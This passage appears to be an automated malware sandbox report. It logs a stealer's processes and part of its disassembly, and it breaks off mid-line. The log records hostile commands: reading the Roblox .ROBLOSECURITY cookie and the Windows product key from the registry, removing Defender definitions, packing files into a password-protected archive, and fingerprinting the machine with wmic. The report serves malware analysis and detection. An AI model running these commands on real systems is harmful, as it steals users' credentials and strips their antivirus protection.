AZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                          Imagebase:0x7ff760310000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:46
                                                          Start time:19:36:18
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:47
                                                          Start time:19:36:18
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:48
                                                          Start time:19:36:18
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\tree.com
                                                          Wow64 process (32bit):false
                                                          Commandline:tree /A /F
                                                          Imagebase:0x7ff6ec980000
                                                          File size:20'992 bytes
                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:49
                                                          Start time:19:36:19
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline"
                                                          Imagebase:0x7ff7584b0000
                                                          File size:2'759'232 bytes
                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:50
                                                          Start time:19:36:19
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:51
                                                          Start time:19:36:19
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:52
                                                          Start time:19:36:19
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\tree.com
                                                          Wow64 process (32bit):false
                                                          Commandline:tree /A /F
                                                          Imagebase:0x7ff6ec980000
                                                          File size:20'992 bytes
                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:53
                                                          Start time:19:36:19
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3733.tmp" "c:\Users\user\AppData\Local\Temp\c3m2uwl3\CSC33F8CF1FA9DB4434A25723BA384E2070.TMP"
                                                          Imagebase:0x7ff6e0520000
                                                          File size:52'744 bytes
                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:54
                                                          Start time:19:36:19
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:55
                                                          Start time:19:36:19
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:56
                                                          Start time:19:36:19
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\tree.com
                                                          Wow64 process (32bit):false
                                                          Commandline:tree /A /F
                                                          Imagebase:0x7ff6ec980000
                                                          File size:20'992 bytes
                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:57
                                                          Start time:19:36:20
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:58
                                                          Start time:19:36:21
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:60
                                                          Start time:19:36:24
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\tree.com
                                                          Wow64 process (32bit):false
                                                          Commandline:tree /A /F
                                                          Imagebase:0x7ff6ec980000
                                                          File size:20'992 bytes
                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:61
                                                          Start time:19:36:24
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:62
                                                          Start time:19:36:24
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:63
                                                          Start time:19:36:24
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                          Imagebase:0x7ff760310000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:64
                                                          Start time:19:36:26
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:65
                                                          Start time:19:36:26
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:66
                                                          Start time:19:36:27
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                          Imagebase:0x7ff760310000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:69
                                                          Start time:19:36:32
                                                          Start date:22/05/2024
                                                          Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                          Imagebase:0x7ff60cae0000
                                                          File size:468'120 bytes
                                                          MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:70
                                                          Start time:19:36:37
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:71
                                                          Start time:19:36:37
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:72
                                                          Start time:19:36:37
                                                          Start date:22/05/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *
                                                          Imagebase:0x7ff71d2b0000
                                                          File size:630'736 bytes
                                                          MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          Has exited:true

                                                          General

                                                          Target ID:73
                                                          Start time:19:36:39
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:74
                                                          Start time:19:36:39
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:75
                                                          Start time:19:36:39
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:wmic os get Caption
                                                          Imagebase:0x7ff748a90000
                                                          File size:576'000 bytes
                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:76
                                                          Start time:19:36:42
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:77
                                                          Start time:19:36:42
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:78
                                                          Start time:19:36:42
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:wmic computersystem get totalphysicalmemory
                                                          Imagebase:0x7ff748a90000
                                                          File size:576'000 bytes
                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:79
                                                          Start time:19:36:43
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:80
                                                          Start time:19:36:43
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:81
                                                          Start time:19:36:43
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:wmic csproduct get uuid
                                                          Imagebase:0x7ff748a90000
                                                          File size:576'000 bytes
                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:82
                                                          Start time:19:36:44
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:83
                                                          Start time:19:36:44
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:84
                                                          Start time:19:36:44
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                          Imagebase:0x7ff760310000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:85
                                                          Start time:19:36:45
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:86
                                                          Start time:19:36:45
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:87
                                                          Start time:19:36:45
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:wmic path win32_VideoController get name
                                                          Imagebase:0x7ff748a90000
                                                          File size:576'000 bytes
                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:88
                                                          Start time:19:36:46
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:89
                                                          Start time:19:36:46
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:90
                                                          Start time:19:36:46
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                          Imagebase:0x7ff760310000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:9.7%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:14.7%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:43
                                                            execution_graph 19536 7ff7b110a8c0 19539 7ff7b110a83c 19536->19539 19546 7ff7b1111298 EnterCriticalSection 19539->19546 19547 7ff7b110d0c0 19558 7ff7b1111298 EnterCriticalSection 19547->19558 16387 7ff7b11102cc 16388 7ff7b11104be 16387->16388 16390 7ff7b111030e _isindst 16387->16390 16389 7ff7b1105aa4 _get_daylight 11 API calls 16388->16389 16407 7ff7b11104ae 16389->16407 16390->16388 16393 7ff7b111038e _isindst 16390->16393 16391 7ff7b10fbe00 _wfindfirst32i64 8 API calls 16392 7ff7b11104d9 16391->16392 16408 7ff7b1116ee4 16393->16408 16398 7ff7b11104ea 16400 7ff7b110b4a4 _wfindfirst32i64 17 API calls 16398->16400 16402 7ff7b11104fe 16400->16402 16405 7ff7b11103eb 16405->16407 16433 7ff7b1116f28 16405->16433 16407->16391 16409 7ff7b11103ac 16408->16409 16410 7ff7b1116ef3 16408->16410 16415 7ff7b11162e8 16409->16415 16440 7ff7b1111298 EnterCriticalSection 16410->16440 16416 7ff7b11103c1 16415->16416 16417 7ff7b11162f1 16415->16417 16416->16398 16421 7ff7b1116318 16416->16421 16418 7ff7b1105aa4 _get_daylight 11 API calls 16417->16418 16419 7ff7b11162f6 16418->16419 16420 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 16419->16420 16420->16416 16422 7ff7b1116321 16421->16422 16426 7ff7b11103d2 16421->16426 16423 7ff7b1105aa4 _get_daylight 11 API calls 16422->16423 16424 7ff7b1116326 16423->16424 16425 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 16424->16425 16425->16426 16426->16398 16427 7ff7b1116348 16426->16427 16428 7ff7b11103e3 16427->16428 16429 7ff7b1116351 16427->16429 16428->16398 16428->16405 16430 7ff7b1105aa4 _get_daylight 11 API calls 16429->16430 16431 7ff7b1116356 16430->16431 16432 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 16431->16432 16432->16428 16441 7ff7b1111298 EnterCriticalSection 16433->16441 19636 7ff7b1118ad0 19639 7ff7b1113240 19636->19639 19640 7ff7b1113292 19639->19640 19641 7ff7b111324d 19639->19641 19645 7ff7b110bdc4 19641->19645 19646 7ff7b110bdf0 FlsSetValue 19645->19646 19647 7ff7b110bdd5 FlsGetValue 19645->19647 19649 7ff7b110bde2 19646->19649 19650 7ff7b110bdfd 19646->19650 19648 7ff7b110bdea 19647->19648 19647->19649 19648->19646 19651 7ff7b110bde8 19649->19651 19652 7ff7b110b07c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19649->19652 19653 7ff7b110f738 _get_daylight 11 API calls 19650->19653 19665 7ff7b1112f14 19651->19665 19654 7ff7b110be65 19652->19654 19655 7ff7b110be0c 19653->19655 19656 7ff7b110be2a FlsSetValue 19655->19656 19657 7ff7b110be1a FlsSetValue 19655->19657 19658 7ff7b110be48 19656->19658 19659 7ff7b110be36 FlsSetValue 19656->19659 19660 7ff7b110be23 19657->19660 19662 7ff7b110ba98 _get_daylight 11 API calls 19658->19662 19659->19660 19661 7ff7b110b4ec __free_lconv_num 11 API calls 19660->19661 19661->19649 19663 7ff7b110be50 19662->19663 19664 7ff7b110b4ec __free_lconv_num 11 API calls 19663->19664 19664->19651 19688 7ff7b1113184 19665->19688 19667 7ff7b1112f49 19703 7ff7b1112c14 19667->19703 19670 7ff7b1112f66 19670->19640 19671 7ff7b110e19c _fread_nolock 12 API calls 19672 7ff7b1112f77 19671->19672 19673 7ff7b1112f7f 19672->19673 19675 7ff7b1112f8e 19672->19675 19674 7ff7b110b4ec __free_lconv_num 11 API calls 19673->19674 19674->19670 19675->19675 19710 7ff7b11132bc 19675->19710 19678 7ff7b111308a 19679 7ff7b1105aa4 _get_daylight 11 API calls 19678->19679 19681 7ff7b111308f 19679->19681 19680 7ff7b11130e5 19684 7ff7b111314c 19680->19684 19721 7ff7b1112a44 19680->19721 19682 7ff7b110b4ec __free_lconv_num 11 API calls 19681->19682 19682->19670 19683 7ff7b11130a4 19683->19680 19685 7ff7b110b4ec __free_lconv_num 11 API calls 19683->19685 19687 7ff7b110b4ec __free_lconv_num 11 API calls 19684->19687 19685->19680 19687->19670 19689 7ff7b11131a7 19688->19689 19692 7ff7b11131b1 19689->19692 19736 7ff7b1111298 EnterCriticalSection 19689->19736 19691 7ff7b1113223 19691->19667 19692->19691 19696 7ff7b110b07c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19692->19696 19697 7ff7b111323b 19696->19697 19699 7ff7b1113292 19697->19699 19700 7ff7b110bdc4 50 API calls 19697->19700 19699->19667 19701 7ff7b111327c 19700->19701 19702 7ff7b1112f14 65 API calls 19701->19702 19702->19699 19704 7ff7b1105578 45 API calls 19703->19704 19705 7ff7b1112c28 19704->19705 19706 7ff7b1112c34 GetOEMCP 19705->19706 19707 7ff7b1112c46 19705->19707 19708 7ff7b1112c5b 19706->19708 19707->19708 19709 7ff7b1112c4b GetACP 19707->19709 19708->19670 19708->19671 19709->19708 19711 7ff7b1112c14 47 API calls 19710->19711 19712 7ff7b11132e9 19711->19712 19714 7ff7b1113326 IsValidCodePage 19712->19714 19719 7ff7b111343f 19712->19719 19720 7ff7b1113340 memcpy_s 19712->19720 19713 7ff7b10fbe00 _wfindfirst32i64 8 API calls 19715 7ff7b1113081 19713->19715 19716 7ff7b1113337 19714->19716 19714->19719 19715->19678 19715->19683 19717 7ff7b1113366 GetCPInfo 19716->19717 19716->19720 19717->19719 19717->19720 19719->19713 19737 7ff7b1112d2c 19720->19737 19793 7ff7b1111298 EnterCriticalSection 19721->19793 19738 7ff7b1112d69 GetCPInfo 19737->19738 19747 7ff7b1112e5f 19737->19747 19742 7ff7b1112d7c 19738->19742 19738->19747 19739 7ff7b10fbe00 _wfindfirst32i64 8 API calls 19741 7ff7b1112efe 19739->19741 19740 7ff7b1113a90 48 API calls 19743 7ff7b1112df3 19740->19743 19741->19719 19742->19740 19748 7ff7b1118a34 19743->19748 19746 7ff7b1118a34 54 API calls 19746->19747 19747->19739 19749 7ff7b1105578 45 API calls 19748->19749 19750 7ff7b1118a59 19749->19750 19753 7ff7b1118700 19750->19753 19754 7ff7b1118741 19753->19754 19755 7ff7b11101e0 _fread_nolock MultiByteToWideChar 19754->19755 19760 7ff7b111878b 19755->19760 19756 7ff7b1118a09 19757 7ff7b10fbe00 _wfindfirst32i64 8 API calls 19756->19757 19759 7ff7b1112e26 19757->19759 19758 7ff7b11188c1 19758->19756 19763 